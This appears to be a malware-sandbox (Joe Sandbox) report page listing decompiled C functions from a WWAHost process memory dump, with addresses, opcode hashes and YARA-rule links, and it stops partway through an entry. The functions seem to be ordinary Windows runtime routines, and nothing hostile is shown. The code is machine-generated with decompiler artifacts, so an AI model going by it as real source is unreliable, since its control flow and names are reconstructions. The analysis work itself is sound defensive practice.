                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0397C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0397C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x39311cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E03A288F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                              0x0397c577
                                              0x0397c57d
                                              0x0397c581
                                              0x0397c5b5
                                              0x0397c5b9
                                              0x0397c5ce
                                              0x0397c5ce
                                              0x0397c5ca
                                              0x00000000
                                              0x0397c5ca
                                              0x0397c5c4
                                              0x0397c5c8
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0397c5ad
                                              0x00000000
                                              0x0397c5af

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b471037c0e0ef38b8ac7ba3ba13acacd45553612f655c7a25560eb09977fec03
                                              • Instruction ID: f681d23d8f9370669964b002dd09bcdc888e64d087048a54547a543b1305de04
                                              • Opcode Fuzzy Hash: b471037c0e0ef38b8ac7ba3ba13acacd45553612f655c7a25560eb09977fec03
                                              • Instruction Fuzzy Hash: 2BF090B291DB919ED731DB588044B22BBDC9B057F0F4848A7D40587291D6A6DC80CA50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0399927A Relevance: .0, Instructions: 32COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 54%
                                              			E0399927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L03974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0399FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E039992C6(_t11, _t14);
				}
				return _t11;
			}





                                              0x03999295
                                              0x03999299
                                              0x0399929f
                                              0x039992aa
                                              0x039992ad
                                              0x039992ae
                                              0x039992af
                                              0x039992b0
                                              0x039992b4
                                              0x039992bb
                                              0x039992bb
                                              0x039992c5

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                              • Instruction ID: 25988b67860e2214dbbe3fb9303b15a2332e43a9b54b91512cc310afa53791b7
                                              • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                              • Instruction Fuzzy Hash: 93E09B323416406BFB61EE5ADC84F57775DDFC2721F04407DB5045E282D6E6DD0987A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A12073 Relevance: .0, Instructions: 32COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 94%
                                              			E03A12073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E03A0FD22(__ecx);
				_t19 =  *0x3a4849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x3a48748; // 0x0
					if(__eflags <= 0) {
						E03A11C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x3a48724 & 0x00000004;
							if(( *0x3a48724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x3a48724; // 0x0
					return E03A08DF1(__ebx, 0xc0000374, 0x3a45890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                              0x03a12076
                                              0x03a12078
                                              0x03a1207d
                                              0x03a12083
                                              0x03a120a4
                                              0x03a120aa
                                              0x03a120ac
                                              0x03a120b7
                                              0x03a120ba
                                              0x03a120bc
                                              0x03a120c9
                                              0x03a120c9
                                              0x03a120d0
                                              0x03a120d2
                                              0x00000000
                                              0x03a120d2
                                              0x03a120be
                                              0x03a120c3
                                              0x03a120c5
                                              0x03a120c7
                                              0x00000000
                                              0x00000000
                                              0x03a120c7
                                              0x03a120bc
                                              0x03a120d4
                                              0x03a12085
                                              0x03a12085
                                              0x03a120a3
                                              0x03a120a3

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2791b90b638d74721dd49c8b457ecdad525f1aa302ac55d4281e09dae12ad541
                                              • Instruction ID: d1b617782c0c5d606ba6f4034cc4a27289f24a1ff8ba3a10d0c01d352d817c70
                                              • Opcode Fuzzy Hash: 2791b90b638d74721dd49c8b457ecdad525f1aa302ac55d4281e09dae12ad541
                                              • Instruction Fuzzy Hash: 6EF0A76E4152984ADE32EB2472113D17B98D7C6250B1D0A8BD4501B205C63ECCA3DA24
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A28D34 Relevance: .0, Instructions: 32COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 43%
                                              			E03A28D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x3a4d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E03977D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0399B640(E03999AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                              0x03a28d34
                                              0x03a28d43
                                              0x03a28d4b
                                              0x03a28d4e
                                              0x03a28d52
                                              0x03a28d5c
                                              0x03a28d6e
                                              0x03a28d5e
                                              0x03a28d67
                                              0x03a28d67
                                              0x03a28d79
                                              0x03a28d7a
                                              0x03a28d7c
                                              0x03a28d81
                                              0x03a28d94

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ba63308419fe1cbfdda7a4ec44d3cfa804e5eed57649419864a04881913adeae
                                              • Instruction ID: 3c1e19e248e5dc04b3c4b860193fc2e0c1b90951e0ceb6ee9a5dd1c1fd11466c
                                              • Opcode Fuzzy Hash: ba63308419fe1cbfdda7a4ec44d3cfa804e5eed57649419864a04881913adeae
                                              • Instruction Fuzzy Hash: 5DF0B475A047189FDB14EFB8D441A6EB7B8EF58700F10809AF905EB281EA38E900C754
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A28B58 Relevance: .0, Instructions: 31COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 36%
                                              			E03A28B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x3a4d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E03977D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0399B640(E03999AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                              0x03a28b67
                                              0x03a28b6f
                                              0x03a28b72
                                              0x03a28b7d
                                              0x03a28b8f
                                              0x03a28b7f
                                              0x03a28b88
                                              0x03a28b88
                                              0x03a28b9a
                                              0x03a28b9b
                                              0x03a28b9d
                                              0x03a28ba2
                                              0x03a28bb5

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f7930fee94e82018b57f9b1e713519ba4f7bfcd0e350987d10b16de5f5c46eb0
                                              • Instruction ID: 2a5204b89c267a99c07f313e6d4fd94b7707dc7e602decf382c889385a69f133
                                              • Opcode Fuzzy Hash: f7930fee94e82018b57f9b1e713519ba4f7bfcd0e350987d10b16de5f5c46eb0
                                              • Instruction Fuzzy Hash: 33F05EB4A04258ABEB10EBA8D906A7EB7B8EB44600F04045AB9159B281EB34E900C798
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03954F2E Relevance: .0, Instructions: 31COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E03954F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E03A288F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0397C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x3931030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                              0x03954f2e
                                              0x03954f34
                                              0x03954f38
                                              0x039b0b85
                                              0x039b0b85
                                              0x039b0b89
                                              0x039b0b9a
                                              0x039b0b9a
                                              0x039b0b9f
                                              0x00000000
                                              0x039b0b9f
                                              0x039b0b94
                                              0x039b0b98
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039b0b98
                                              0x03954f3e
                                              0x03954f48
                                              0x00000000
                                              0x03954f6e
                                              0x00000000
                                              0x03954f70

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4a14f0aea468e12979192febf1fe61badc0ce86de2be74d427f5910f0a15f0d8
                                              • Instruction ID: aefe138a4d5b6d23bd4f6ea99ba0b61c97cbb8611434d53a0506aac7ab44be42
                                              • Opcode Fuzzy Hash: 4a14f0aea468e12979192febf1fe61badc0ce86de2be74d427f5910f0a15f0d8
                                              • Instruction Fuzzy Hash: 6AF0BE365257A68FDB70D718C384FA3B7ECAB007FCF4844A5D8058BB20D724E880C640
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A28CD6 Relevance: .0, Instructions: 31COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 36%
                                              			E03A28CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x3a4d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E03977D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0399B640(E03999AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                              0x03a28ce5
                                              0x03a28ced
                                              0x03a28cf0
                                              0x03a28cfb
                                              0x03a28d0d
                                              0x03a28cfd
                                              0x03a28d06
                                              0x03a28d06
                                              0x03a28d18
                                              0x03a28d19
                                              0x03a28d1b
                                              0x03a28d20
                                              0x03a28d33

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a3f7502d79bddf517f81fd56f45c2654bd2e3b564b0288079310929a91645833
                                              • Instruction ID: 84e72d9de337ba3bcdf88e1e30cae7da328e041b5f257714c6f31c59740e4d93
                                              • Opcode Fuzzy Hash: a3f7502d79bddf517f81fd56f45c2654bd2e3b564b0288079310929a91645833
                                              • Instruction Fuzzy Hash: 24F08275A05218AFDF04EBECE945E6E77B8EF58300F14019AF915EB2C1EA38E904C754
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0397746D Relevance: .0, Instructions: 31COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 88%
                                              			E0397746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0396EB70(__ecx, 0x3a479a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E039995D0();
							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                              0x0397746d
                                              0x0397746d
                                              0x0397746d
                                              0x03977471
                                              0x03977488
                                              0x039bf92d
                                              0x0397748e
                                              0x03977491
                                              0x03977495
                                              0x039bf937
                                              0x039bf93a
                                              0x039bf94e
                                              0x039bf953
                                              0x039bf956
                                              0x039bf956
                                              0x03977495
                                              0x00000000
                                              0x03977488
                                              0x03977473
                                              0x03977478
                                              0x0397747d
                                              0x03977481
                                              0x00000000
                                              0x03977481
                                              0x0397747d
                                              0x0397747a
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2b52020770cab24dd4cccb1d8b5c93ae59a647244b846ddd78b8235eee402447
                                              • Instruction ID: 609c8fdc2dfb392f6a0480c92f789369cceb2022b67d800727b661926e9435ff
                                              • Opcode Fuzzy Hash: 2b52020770cab24dd4cccb1d8b5c93ae59a647244b846ddd78b8235eee402447
                                              • Instruction Fuzzy Hash: B9F0B439901245BACF01D7ECC940BB9BB77AF84390F080955D8D1AB1D1E775D801C7C5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0398A44B Relevance: .0, Instructions: 29COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0398A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x3a47b9c; // 0x0
				_t15 = __ecx;
				_t16 = L03974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0399FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                              0x0398a44b
                                              0x0398a453
                                              0x0398a472
                                              0x0398a476
                                              0x00000000
                                              0x0398a493
                                              0x0398a47a
                                              0x0398a47f
                                              0x0398a486
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ac26db3f2a9c1c2c5ca2e7574a0c7846dde9602f094aeac7fd4662a7ab317368
                                              • Instruction ID: b182bec9deeae61f8c48ee30309d5f7843b904492897e0c5f9276b9b654e76ef
                                              • Opcode Fuzzy Hash: ac26db3f2a9c1c2c5ca2e7574a0c7846dde9602f094aeac7fd4662a7ab317368
                                              • Instruction Fuzzy Hash: 87E092B2A01421ABD622AB2AEC00F66B39DDBD4A51F0D4436E505CB264D629DD02C7E0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0395F358 Relevance: .0, Instructions: 28COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 79%
                                              			E0395F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0398F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L03974620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                              0x0395f35d
                                              0x0395f361
                                              0x0395f367
                                              0x0395f372
                                              0x0395f38c
                                              0x0395f38c
                                              0x0395f394

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                              • Instruction ID: b33840848c31ed6ef8415324f14ec05db53daacc133dc522ff944219037cdd27
                                              • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                              • Instruction Fuzzy Hash: F3E0D832A41218FBDB31F6D99D05F5ABBACDB94BA0F040155BD05DB150D5709D40C3D0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0396FF60 Relevance: .0, Instructions: 22COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0396FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x39311a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E03A288F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E03970050(_t14);
				}
			}










                                              0x0396ff66
                                              0x0396ff6b
                                              0x00000000
                                              0x0396ff8f
                                              0x00000000
                                              0x0396ff8f

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 835a6f4ce3942673c6833628d78a815f767fb1d542c11cc89c8da9d277ecac4f
                                              • Instruction ID: 35be5261345062d8f35cec198c64e808cff6cf5053963582d9e9928a2811f048
                                              • Opcode Fuzzy Hash: 835a6f4ce3942673c6833628d78a815f767fb1d542c11cc89c8da9d277ecac4f
                                              • Instruction Fuzzy Hash: C4E0DFB06063049FD734DB55E140F257B9CAB427A1F1D849EE40A4B201CA21D880C206
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A0D380 Relevance: .0, Instructions: 21COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E03A0D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0395E8B0(__ecx, _a4, 0xfff);
					L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                              0x03a0d38a
                                              0x03a0d39b
                                              0x03a0d3b1
                                              0x00000000
                                              0x03a0d3b6
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                              • Instruction ID: 175b4e0d26e61716bdfb4c0795f04fe688d34ae80069a80b6a78a462fc0c62a4
                                              • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                              • Instruction Fuzzy Hash: 7BE0C236280304BBDB22DF94DC00FB9BB2ADB807A1F104032FE085E6D0C6719D91D6C4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039E41E8 Relevance: .0, Instructions: 21COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 82%
                                              			E039E41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x3a308f0);
				_t5 = E039AD08C(__ebx, __edi, __esi);
				if( *0x3a487ec == 0) {
					E0396EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x3a487ec == 0) {
						 *0x3a487f0 = 0x3a487ec;
						 *0x3a487ec = 0x3a487ec;
						 *0x3a487e8 = 0x3a487e4;
						 *0x3a487e4 = 0x3a487e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L039E4248();
				}
				return E039AD0D1(_t5);
			}





                                              0x039e41e8
                                              0x039e41ea
                                              0x039e41ef
                                              0x039e41fb
                                              0x039e4206
                                              0x039e420b
                                              0x039e4216
                                              0x039e421d
                                              0x039e4222
                                              0x039e422c
                                              0x039e4231
                                              0x039e4231
                                              0x039e4236
                                              0x039e423d
                                              0x039e423d
                                              0x039e4247

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c4144cd398d0396b1f4c19f35393ec44c902ec4c00f1e4f7af5efad0e86e0224
                                              • Instruction ID: a6ba25ae75fc3f05bc177cf0c548dc90029a5fddb8a705fb045e836dec411c71
                                              • Opcode Fuzzy Hash: c4144cd398d0396b1f4c19f35393ec44c902ec4c00f1e4f7af5efad0e86e0224
                                              • Instruction Fuzzy Hash: 23F0157C852724DECBE1FFA9B6207283AACF7C6322F00415A91008B688D73A4582DF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0398A185 Relevance: .0, Instructions: 20COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0398A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x3a467e4 >= 0xa) {
					if(_t5 < 0x3a46800 || _t5 >= 0x3a46900) {
						return L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E03970010(0x3a467e0, _t5);
				}
			}





                                              0x0398a190
                                              0x0398a1a6
                                              0x0398a1c2
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0398a192
                                              0x0398a192
                                              0x0398a19f
                                              0x0398a19f

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6abb4f79e7a4d321a6585002d27eae75ad4931f78dc90dc701ee6a6222d10cf3
